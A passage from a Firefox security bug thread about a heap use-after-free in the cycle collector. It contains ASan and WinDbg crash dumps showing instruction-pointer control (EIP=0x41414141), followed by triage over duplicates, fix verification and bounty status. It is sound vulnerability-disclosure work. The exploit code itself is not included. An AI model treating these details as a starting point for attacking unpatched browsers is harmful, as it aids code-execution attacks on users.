    #6 0x7fe518757131 in mozilla::dom::FetchDriver::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:1050:15
    #7 0x7fe512c6a36e in nsCORSListenerProxy::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsCORSListenerProxy.cpp:480:20
    #8 0x7fe512bdc449 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #9 0x7fe512be6bb2 in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #10 0x7fe512c87585 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #11 0x7fe512aa8721 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #12 0x7fe512be4f9a in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #13 0x7fe5134e0adb in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #14 0x7fe5132bf7ed in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7211:32
    #15 0x7fe5131092c0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2168:25
    #16 0x7fe51310564d in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2092:9
    #17 0x7fe51310729b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #18 0x7fe513107877 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #19 0x7fe511ff66d1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #20 0x7fe512028430 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #21 0x7fe51202e848 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #22 0x7fe5131105fa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #23 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #24 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #25 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #26 0x7fe51a686b69 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #27 0x7fe51e331aff in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #28 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #29 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #30 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #31 0x7fe51e33139b in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #32 0x5587bbf51802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #33 0x5587bbf51802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #34 0x7fe5320beb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8 in CanonicalizeXPCOMParticipant
Shadow bytes around the buggy address:
  0x0c1c80008680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1c80008690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1c800086a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800086b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1c800086c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c1c800086d0: fd fd fd fd fa fa fa fa fa fa fa fa[fd]fd fd fd
  0x0c1c800086e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800086f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c80008700: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c1c80008710: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c80008720: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==7796==ABORTING

Ni for comment #4

Flags: needinfo?(amarchesini)

Attached a PoC of EIP control with 32 bit Firefox on Windows.

Firefox Version: 70.0a1 (2019-07-17) (32-bit)
OS: Windows 10 64 bit

(2060.2c04): Access violation - code c0000005 (!!! second chance !!!)
eax=41414141 ebx=1d109060 ecx=0537ee44 edx=18361aa8 esi=1d179000 edi=18383100
eip=41414141 esp=0537ee24 ebp=0537ee58 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210283
41414141 0000            add     byte ptr [eax],al          ds:002b:41414141=00
0:087> r
eax=41414141 ebx=1d109060 ecx=0537ee44 edx=18361aa8 esi=1d179000 edi=18383100
eip=41414141 esp=0537ee24 ebp=0537ee58 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210283
41414141 0000            add     byte ptr [eax],al          ds:002b:41414141=00
0:087> k
 # ChildEBP RetAddr  
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 0537ee20 5c059502 0x41414141
01 0537ee58 5c04bdfb xul!CCGraphBuilder::NoteXPCOMChild+0x72 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 2155] 
02 0537ee84 5c04aa03 xul!mozilla::CycleCollectedJSRuntime::NoteGCThingXPCOMChildren+0x11b [z:\task_1563356416\build\src\xpcom\base\CycleCollectedJSRuntime.cpp @ 648] 
03 0537eecc 5c058bb2 xul!mozilla::CycleCollectedJSRuntime::TraverseGCThing+0xf3 [z:\task_1563356416\build\src\xpcom\base\CycleCollectedJSRuntime.cpp @ 707] 
04 0537ef24 5c05b527 xul!CCGraphBuilder::BuildGraph+0xc2 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 2061] 
05 0537ef3c 5c05d484 xul!nsCycleCollector::MarkRoots+0x37 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 2674] 
06 0537efa4 5c05f25b xul!nsCycleCollector::Collect+0xe4 [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 3425] 
07 0537efd0 5ce39729 xul!nsCycleCollector_collectSlice+0x7b [z:\task_1563356416\build\src\xpcom\base\nsCycleCollector.cpp @ 3963] 
08 0537f140 5ce3c175 xul!nsJSContext::RunCycleCollectorSlice+0x799 [z:\task_1563356416\build\src\dom\base\nsJSEnvironment.cpp @ 1479] 
09 0537f224 5afadd4b xul!CCRunnerFired+0x6b5 [z:\task_1563356416\build\src\dom\base\nsJSEnvironment.cpp @ 1888] 
0a 0537f244 5afadbfd xul!std::_Func_impl_no_alloc<bool (__cdecl*)(mozilla::TimeStamp),bool,mozilla::TimeStamp>::_Do_call+0x2b
0b 0537f2c4 5a8e30de xul!mozilla::IdleTaskRunner::Run+0x11d [z:\task_1563356416\build\src\xpcom\threads\IdleTaskRunner.cpp @ 63] 
0c 0537f7b0 5a8e1ebb xul!nsThread::ProcessNextEvent+0x110e [z:\task_1563356416\build\src\xpcom\threads\nsThread.cpp @ 1225] 
0d 0537f7d4 5aa95852 xul!NS_ProcessNextEvent+0x3b [z:\task_1563356416\build\src\xpcom\threads\nsThreadUtils.cpp @ 486] 
0e 0537f7fc 5a8c3574 xul!mozilla::ipc::MessagePump::Run+0xe2 [z:\task_1563356416\build\src\ipc\glue\MessagePump.cpp @ 88] 
0f 0537f834 5a8e1ae1 xul!MessageLoop::RunHandler+0x44 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 309] 
10 0537f854 5aa956fd xul!MessageLoop::Run+0x41 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 291] 
11 0537f864 5aa93121 xul!nsBaseAppShell::Run+0x4d [z:\task_1563356416\build\src\widget\nsBaseAppShell.cpp @ 139] 
12 0537f884 5ef4aee8 xul!nsAppShell::Run+0xa1 [z:\task_1563356416\build\src\widget\windows\nsAppShell.cpp @ 412] 
13 0537f8a0 5c4994a0 xul!XRE_RunAppShell+0x38 [z:\task_1563356416\build\src\toolkit\xre\nsEmbedFunctions.cpp @ 919] 
14 0537f8b8 5a8c3574 xul!mozilla::ipc::MessagePumpForChildProcess::Run+0x70 [z:\task_1563356416\build\src\ipc\glue\MessagePump.cpp @ 272] 
15 0537f8f0 5a8e1ae1 xul!MessageLoop::RunHandler+0x44 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 309] 
16 0537f910 5ef4a927 xul!MessageLoop::Run+0x41 [z:\task_1563356416\build\src\ipc\chromium\src\base\message_loop.cc @ 291] 
17 0537fa38 5ef4e5f1 xul!XRE_InitChildProcess+0x367 [z:\task_1563356416\build\src\toolkit\xre\nsEmbedFunctions.cpp @ 758] 
18 0537fa4c 00b316c1 xul!mozilla::BootstrapImpl::XRE_InitChildProcess+0x11 [z:\task_1563356416\build\src\toolkit\xre\Bootstrap.cpp @ 67] 
19 0537fa7c 00b3134b firefox!content_process_main+0x61 [z:\task_1563356416\build\src\ipc\contentproc\plugin-container.cpp @ 56] 
1a 0537fbe0 00b311cd firefox!NS_internal_main+0xab [z:\task_1563356416\build\src\browser\app\nsBrowserApp.cpp @ 267] 
1b 0537fc10 00b6a7dc firefox!wmain+0x1cd [z:\task_1563356416\build\src\toolkit\xre\nsWindowsWMain.cpp @ 131] 
1c 0537fc58 77106359 firefox!__scrt_common_main_seh+0xfa [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 288] 
1d 0537fc68 777f7a94 KERNEL32!BaseThreadInitThunk+0x19
1e 0537fcc4 777f7a64 ntdll!__RtlUserThreadStart+0x2f
1f 0537fcd4 00000000 ntdll!_RtlUserThreadStart+0x1b
Group: dom-core-security → core-security-release

Gonna reopen this per the comments from the reporter and move back to dom-core-sec - we can re-close if we're still convinced this is a dupe.

Group: core-security-release → dom-core-security
Status: RESOLVED → REOPENED
Resolution: DUPLICATE → ---

I was working on bug 1564821 and tried to reproduce it in order to verify the bug.

I managed to crash Firefox ASAN build (Build ID: 20190710215049) and also the latest Firefox ASAN build (Build ID: 20190717093640) on Windows 10 x64 using the steps and the test case attached in the user story (https://bugzilla.mozilla.org/show_bug.cgi?id=1564821#c0).

Are there any other details I'm not aware of?
Thanks.

Status: REOPENED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE

So where exactly should I follow on how things are going on this bug since I've been asked to add comments here instead of bug 1564821 and this is duplicate of another bug where I don't have access?

Flags: needinfo?(amarchesini)

Hi Hani, I didn't know you didn't have access to bug 1567419. Now you have it.
There were 2 bugs for the same crash and I picked one of them for my commit message.

Flags: needinfo?(amarchesini)

From comment 4

The fix for bug 1564821 was checked in two days ago [...] but I can still trigger this bug with my very PoC in today's nightly asan build

And that's why it's better when we make security bugs "depend on" each other rather than presuming "duplicate" :-(

I'm glad Hani was in here trying to verify it regardless.

We should avoid duping to NEWER bugs, too, but since that one already had a patch I guess we have to live with it and just be careful with the bounty attribution.

Status: RESOLVED → REOPENED
Depends on: 1567419
Flags: sec-bounty- → sec-bounty?
Resolution: DUPLICATE → ---

Looben: the fix for bug 1567419 was checked in yesterday, should be testable in July 25 builds. Is your bug fixed now or is it yet a 3rd bug here?

(In reply to Daniel Veditz [:dveditz] from comment #13)

Looben: the fix for bug 1567419 was checked in yesterday, should be testable in July 25 builds. Is your bug fixed now or is it yet a 3rd bug here?

I downloaded the new nightly ASAN build (26 Jul). Could not reproduce it anymore with the same test case.

Hani, would you mind re-verifying this bug's status?

Flags: needinfo?(hani.yacoub)

I've already verified bug 1564821 and bug 1567419 using the same steps from "https://bugzilla.mozilla.org/show_bug.cgi?id=1564821#c0".
And since this bug is still reopened and not fixed I left it like that.

Are the steps for this bug any different than the others?

Flags: needinfo?(hani.yacoub) → needinfo?(overholt)

baku's in a better position to answer comment 16 than I am.

Flags: needinfo?(overholt) → needinfo?(amarchesini)

Hani, thanks for debugging and testing this issue. I would like to know if this issue is still reproducible after bug 1564821 and bug 1567419.
I spent a bit of time today debugging this issue and, using an ASAN build, I was not able to reproduce the crash. Should we close this bug? Is it still valid?

Flags: needinfo?(amarchesini) → needinfo?(hani.yacoub)

I couldn't reproduce the crash, I tried on the latest Firefox Nightly ASAN build on Windows 10 x64, Mac OS X 10.14 and on Ubuntu 18.04 x64.
Should I mark this bug as verified then?

Flags: needinfo?(hani.yacoub) → needinfo?(amarchesini)

Yes, please. I mark the bug as dup of bug 1567419.

Status: REOPENED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE
Status: RESOLVED → REOPENED
Resolution: DUPLICATE → ---
Status: REOPENED → RESOLVED
Closed: 5 years ago
Flags: sec-bounty? → sec-bounty+
Resolution: --- → FIXED
Whiteboard: [fixed by bug 1567419]

re-rating based on comment 6

Keywords: sec-high → sec-critical
Assignee: nobody → amarchesini
Group: dom-core-security → core-security-release
Target Milestone: --- → mozilla70
Flags: qe-verify-
Whiteboard: [fixed by bug 1567419] → [fixed by bug 1567419][post-critsmash-triage]
Group: core-security-release